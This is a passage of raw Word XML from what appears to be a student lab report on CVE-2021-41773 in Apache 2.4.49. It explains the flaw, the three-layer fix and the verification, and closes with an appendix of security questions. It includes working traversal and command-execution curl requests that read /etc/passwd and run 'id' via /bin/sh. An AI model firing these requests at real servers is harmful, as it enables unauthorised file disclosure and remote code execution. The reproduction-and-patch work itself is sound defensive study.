        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the segment becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_core_translate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> joins the result to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DocumentRoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the filesystem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resolves the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the path escapes the web root.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This is why the exploit uses the odd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> spelling: a plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is caught by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check; the encoded variant is not. The defect is a validate-before-normalise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logic error, not a missing check.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configuration makes the impact worse:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Directory /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so paths outside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document root are authorised at all;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mod_cgi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mod_cgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are loaded, so the traversed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is *executed*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instead of merely disclosed.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docker-compose/Dockerfile showing 2.4.49 + Require all granted + CGI]]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8. Applied fix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Three independent layers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/fixed/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):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Patch the software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — base image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>httpd:2.4.51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The corrected normaliser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decodes first and validates afterwards, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can no longer hide a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>..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2.4.51 rather than 2.4.50, because 2.4.50 still allowed a variant bypass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%%32%65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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Restore default-deny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&lt;Directory /&gt; Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, with an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explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Directory "/usr/local/apache2/htdocs"&gt; Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Even 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future traversal bug can no longer read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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Reduce the attack surface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mod_cgi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mod_cgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not loaded. A static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file service has nothing to execute, so file disclosure cannot become RCE.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FROM httpd:2.4.51</w:t>
        <w:br/>
        <w:t>RUN sed -i 's|^LoadModule cgi_module|#LoadModule cgi_module|'  /usr/local/apache2/conf/httpd.conf ; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sed -i 's|^LoadModule cgid_module|#LoadModule cgid_module|' /usr/local/apache2/conf/httpd.conf</w:t>
        <w:br/>
        <w:t>COPY hardening.conf /usr/local/apache2/conf/extra/hardening.conf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Why this is effective: layer 1 removes the vulnerable code path; layers 2 and 3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are not redundant "belt and braces" but separate trust boundaries —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authorisation layer protects against *any* path-normalisation bug, and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attack-surface layer protects against *any* file-disclosure bug being escalated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to code execution.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9. Proof that the vulnerability is eliminated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Same commands, rebuilt environment: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vulnerability/fixed &amp;&amp; docker compose up --build -d</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl --path-as-is -i 'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
        <w:br/>
        <w:t># body contains no root:x:0:0</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl --path-as-is -i --data 'echo;id' 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
        <w:br/>
        <w:t># body contains no uid=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Regression test — the service must still work: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-i http://127.0.0.1:8080/</w:t>
        <w:br/>
        <w:t>HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>&lt;html&gt;&lt;body&gt;&lt;h1&gt;It works!&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;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9.1 The three scenarios, measured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To show that the patch and the hardening are two *different* controls,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vulnerable 2.4.49 binary was also run with its default (secure) configuration,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i.e. the code is still vulnerable but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and no CGI.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Scenario (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> header)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 xml:space="preserve">Traversal → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>/etc/passwd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CGI execution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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>GET /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2.4.49 + Vulhub config (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Apache/2.4.49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200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root:x:0:0:root:/root:/bin/bash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200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uid=1(daemon) gid=1(daemon)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200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2.4.49 + default config (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Apache/2.4.49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403 Forbidden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403 Forbidden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200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2.4.51 + hardening (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Apache/2.4.51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400 Bad Request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400 Bad Request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200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sz w:val="22"/>
        </w:rPr>
        <w:t>Reading the table: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1 is the vulnerability;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2 is the *configuration* layer alone — the vulnerable code is present,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attack still fails, so the fix cannot rely on the version bump being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applied correctly everywhere;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3 is the *patch* — the request now dies inside the normaliser (400)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before authorisation, which is what a genuine code fix looks like. A 403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would mean "the router still resolved it and authorisation caught it".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Automated verdict (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), one run per phase: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PHASE 1: Apache 2.4.49 + Vulhub config</w:t>
        <w:br/>
        <w:t>VERDICT: file disclosure = SUCCESS (vulnerable, as expected)</w:t>
        <w:br/>
        <w:t>VERDICT: command execution = SUCCESS (vulnerable, as expected)</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability reproduced</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 2: Apache 2.4.49 (still vulnerable code) + default hardening</w:t>
        <w:br/>
        <w:t>VERDICT: traversal blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: command execution blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 3: Apache 2.4.51 + hardening</w:t>
        <w:br/>
        <w:t>VERDICT: traversal blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: command execution blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated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Raw transcripts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/cve-41773-all.log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reports/cve-41773-phase1.log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reports/cve-41773-hardened-config.log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reports/cve-41773-phase2.log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fixed environment – both attacks return 400, / still 200]]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hardened 2.4.49 – both attacks return 403, / still 200]]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10. Conclusion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work produced (a) a working API whose security properties are enforced in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code *and* pinned by tests, (b) a CI pipeline that fails on a medium SAST finding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or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for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 real CVE.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most transferable lesson is from part (c): a vulnerability does not have to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be a missing check. In CVE-2021-41773 the check existed and was correct — it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just ran on a different representation of the string than the one that was later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used. Input must be normalised *before* it is validated, never after,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defence in depth (default-deny + minimal attack surface) is what keeps one such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mistake from becoming remote code execution.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Appendix A. Control questions (short answers)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bcrypt vs SHA-256 for passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256 is designed to be fast, so a GPU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can try billions of candidates per second. bcrypt is deliberately slow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tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside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hash, so identical passwords produce different hashes and precomputed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rainbow tables do not apply.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SAST vs DAST.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAST analyses source code without running it — it sees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every branch, including unreachable code, but produces false positives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cannot see configuration or runtime state. DAST attacks a running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application from outside — it finds real, reachable issues but only covers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what it can reach and gives less precise localisation.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JWT mechanism.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A JWT is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>base64url(header).base64url(payload).signature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payload carries claims (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). The server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verifies the signature with a shared secret (HS256) or public key (RS256)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checks the time-based and issuer claims. The payload is signed, not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encrypted — anyone can read it, so no secrets belong in it.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Risk of not auditing dependencies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Third-party code runs with your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privileges. An unpatched library with a known CVE (Log4Shell,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event-stream incident) gives an attacker code execution or data access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without ever touching your own source. SCA is the only control that catches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this, because SAST looks at *your* code.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Docker/Vulhub vs installing vulnerable software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containers are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disposable, isolated and reproducible: no host pollution, no leftover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services, a rollback is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docker compose down</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and the exact vulnerable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version is pinned in a file that can be shared with the whole class.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Vulnerability vs exploit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A vulnerability is the flaw itself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ap_normalize_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it validates before decoding). An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exploit is the concrete sequence of requests that abuses it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curl --path-as-is /icons/.%2e/…/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In this work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vulnerability is in Apache's normaliser; the exploit is the curl request.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Why regression testing after a patch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A patch changes behaviour, and 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security fix that disables the feature is not a fix. Here, a perfectly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"secure" answer would be to block the whole service; the regression check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GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> still returns 200) proves the legitimate path still works.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Why reproduce CVEs as a specialist.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A pentester needs to know what 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working exploit looks like in order to judge whether a target is really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affected, and a SOC analyst needs the same knowledge to recognise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traffic in logs. Reproduction turns a CVE description into a concrete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signature: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern in a URL is trivial to grep for once you have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seen it.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